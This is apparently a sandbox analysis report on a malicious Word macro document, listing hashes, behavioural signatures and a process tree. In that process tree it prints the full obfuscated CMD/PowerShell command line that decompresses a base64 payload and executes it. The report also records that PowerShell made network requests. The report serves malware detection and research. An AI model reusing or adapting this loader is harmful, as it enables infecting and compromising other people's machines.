Analysis
-
max time kernel
101s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09-09-2024 14:43
Behavioral task
behavioral1
Sample
d68746ebcb6ac5af836544b4ce3ae2b3_JaffaCakes118.doc
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
d68746ebcb6ac5af836544b4ce3ae2b3_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
d68746ebcb6ac5af836544b4ce3ae2b3_JaffaCakes118.doc
-
Size
68KB
-
MD5
d68746ebcb6ac5af836544b4ce3ae2b3
-
SHA1
6889ed93be08ac689a3e35fd55bfc5a2b6bb7b9e
-
SHA256
d5e5f1c88b98b55284ee3f91dd7380f6e221a336079b2fe669bda50e42e24bb0
-
SHA512
6ed9155d121cfc4f2144fdaab8aa1b1094f7ed46a174f0d3413a6fb386447ca319c997131bffc958be1b39bb1484d8af35c1462f976559befbfd661c9c93e96c
-
SSDEEP
768:sTBSVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9tcK2tAcnBnip:s9Socn1kp59gxBK85fBt+a96PB
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2796 376 CMD.exe 29 -
Blocklisted process makes network request 7 IoCs
flow pid Process 5 2604 powershell.exe 7 2604 powershell.exe 8 2604 powershell.exe 9 2604 powershell.exe 11 2604 powershell.exe 13 2604 powershell.exe 15 2604 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 376 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2604 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 376 WINWORD.EXE 376 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 376 wrote to memory of 2888 376 WINWORD.EXE 30 PID 376 wrote to memory of 2888 376 WINWORD.EXE 30 PID 376 wrote to memory of 2888 376 WINWORD.EXE 30 PID 376 wrote to memory of 2888 376 WINWORD.EXE 30 PID 376 wrote to memory of 2796 376 WINWORD.EXE 31 PID 376 wrote to memory of 2796 376 WINWORD.EXE 31 PID 376 wrote to memory of 2796 376 WINWORD.EXE 31 PID 376 wrote to memory of 2796 376 WINWORD.EXE 31 PID 2796 wrote to memory of 2604 2796 CMD.exe 34 PID 2796 wrote to memory of 2604 2796 CMD.exe 34 PID 2796 wrote to memory of 2604 2796 CMD.exe 34 PID 2796 wrote to memory of 2604 2796 CMD.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d68746ebcb6ac5af836544b4ce3ae2b3_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:376 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2888
-
-
C:\Windows\SysWOW64\CMD.exeCMD cmd.EXE /C"SeT OpG= (NEW-objEcT sYsTem.Io.compressiON.DeflaTESTREaM([Io.MemORySTReaM] [CONvErT]::FroMbaSE64STRIng( 'TZBBa8JAEIX/Sg4La0jdHARpXQJiROqhPagghV6SzZisJrtxd2LahPz3bkShl4F535s3zJCdKSMF7VSnZxDofQKyI6RxKUEhJ93mENECsV6EoUWA0qJJZF4gKKlyJnQV2nV8NcuHp21bJ2ZgUQqmAMNV9Tb7D08msWBcVQJcEx6e0DT23BhmmnCW5QUcuycQ0ioQ2lbgMu24kqVujrJ9XUqc0CX1OVntOy/y6Ot8TjnZfX1EBNRtgVDVAf2mwcgDyuAHKD9pA4koJuT9GntSeeONfo/mtyfuF2ytW1XqJNvIEu6eF28M9PlW3fQFplsXeld46nIufBAJiqIfhj8=' ),[io.COMpResSIoN.cOmPRessiONmOde]::deComprEsS ) ^|FOreacH{NEW-objEcT iO.sTreAMREaDer($_ , [TExt.enCoDING]::ASCIi ) }).READtOENd() ^| . ( ([StRiNG]$veRBOsEprEFerenCE)[1,3]+'X'-joiN'')&& pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )"2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5282e10c3b46893225cfe5d173d60b0ec
SHA1d3037ad32e4cc245c4997325c259c90578d49263
SHA2562e8e557602927345cb7cc42df90bea4bb7b0ba1179921390805eab40ab5de291
SHA51237091d4df993a8fed2d51a059b83052131f38214e84e43e41b5ced2e85e4d53de10b598b6de8c01d90a3db0822ea5b299968cb87456a5422b27eea05dcd1dd37